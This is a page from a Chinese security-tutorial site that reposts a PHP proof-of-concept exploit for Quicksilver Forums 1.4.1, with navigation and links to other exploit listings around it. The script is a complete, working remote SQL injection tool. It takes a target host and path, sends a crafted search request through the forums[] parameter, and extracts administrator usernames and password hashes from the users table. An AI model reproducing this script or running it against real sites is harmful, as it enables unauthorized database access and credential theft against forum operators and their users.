• linkedu视频
  • 平面设计
  • 电脑入门
  • 操作系统
  • 办公应用
  • 电脑硬件
  • 动画设计
  • 3D设计
  • 网页设计
  • CAD设计
  • 影音处理
  • 数据库
  • 程序设计
  • 认证考试
  • 信息管理
  • 信息安全
菜单
linkedu.com
  • 网页制作
  • 数据库
  • 程序设计
  • 操作系统
  • CMS教程
  • 游戏攻略
  • 脚本语言
  • 平面设计
  • 软件教程
  • 网络安全
  • 电脑知识
  • 服务器
  • 视频教程
  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链
您的位置:首页 > 网络安全 >Exploit > Quicksilver Forums 1.4.1 forums[] Remote SQL Injection Exploit

Quicksilver Forums 1.4.1 forums[] Remote SQL Injection Exploit

作者:佚名 字体:[增加 减小] 来源:互联网

佚名 向大家分享了Quicksilver Forums 1.4.1 forums[] Remote SQL Injection Exploit ,其中包含quicksilver,quicksilver引擎,quicksilver官网,quicksilver渲染器,quicksilver cruises等知识点,遇到此问题的同学们可以参考下
<?php
/*
. vuln.: Quicksilver Forums 1.4.1 (forums[]) Remote SQL Injection Exploit
. download: http://www.quicksilverforums.com/
.
. author: irk4z[at]yahoo.pl
. homepage: http://irk4z.wordpress.com/
.
. greets: all friends ;)
.
. this is PoC exploit
*/

$host = $argv[1];
$path = $argv[2];
$prefix = "qsf_"; // this is default prefix

echo
".\n. Quicksilver Forums 1.4.1 (forums[]) Remote SQL Injection Exploit\n.\n".
". author: irk4z[at]yahoo.pl\n".
". homepage: http://irk4z.wordpress.com/\n".
".\n".
". usage: php ".$argv[0]." host path\n".
". php ".$argv[0]." localhost /\n\n";

if(empty($host)||empty($path))die('# wrong host or path..');

$post_data = "query=I-like-it&forums[]=2)/**/limit/**/0/**/UNION/**/SELECT/**/1,1,concat(0x5b3a213a5d,user_name,0x3A,user_password,0x5b3a213a5d),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/".$prefix."users/**/WHERE/**/user_group=1/*&searchtype=match&member_text=&member_select=exact&showposts_check=on&limit_check=on&limit_chars=400&time_check=on&time_way_select=newer&time_select=31&submit=Search";

$data = "POST ".$path."index.php?a=search HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-length: ".strlen($post_data)."\r\n";
$data .= "Connection: Close\r\n";
$data .= "\r\n";
$data .= $post_data."\r\n\r\n";

$s = @fsockopen($host, 80);
if (empty($s)) die('# wrong host..');

fputs($s, $data); $retu ='';

while(!feof($s)){
$retu .= fgets($s);
}

fclose($s);

$tmp = explode('[:!:]',$retu);
if(empty($tmp[1]))die('sorry, exploit failed.. maybe try again in a few seconds..');
echo " " . $tmp[1] . "\n\ndone.";
?>

</div>

您可能想查找下面的文章:

  • Quicksilver Forums 1.4.1 forums[] Remote SQL Injection Exploit

相关文章

  • Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit
  • IntelliTamper 2.07/2.08 Beta 4 A HREF Remote Buffer Overflow Exploit
  • Sun xVM VirtualBox
  • Maian Events 2.0 Insecure Cookie Handling Vulnerability
  • NoName Script
  • MS Windows (.doc File) Malformed Pointers Denial of Service Exploit
  • BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (py)
  • Mole Group Last Minute Script
  • Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit
  • Ultra Office ActiveX Control Remote Buffer Overflow Exploit

文章分类

  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链

最近更新的内容

    • Mole Group Last Minute Script
    • GeekLog
    • Windows Media Encoder wmex.dll ActiveX BOF Exploit (MS08-053)
    • Sun xVM VirtualBox
    • trixbox (langChoice) Local File Inclusion Exploit (connect-back)
    • BoonEx Ray 3.5 (sIncPath) Remote File Inclusion Vulnerability
    • Download Accelerator Plus - DAP 8.6 (AniGIF.ocx) Buffer Overflow PoC
    • IceBB
    • FlashGet 1.9.0.1012 (FTP PWD Response) BOF Exploit (safeseh)
    • Mole Group Real Estate Script

关于我们 - 联系我们 - 免责声明 - 网站地图

©2020-2025 All Rights Reserved. linkedu.com 版权所有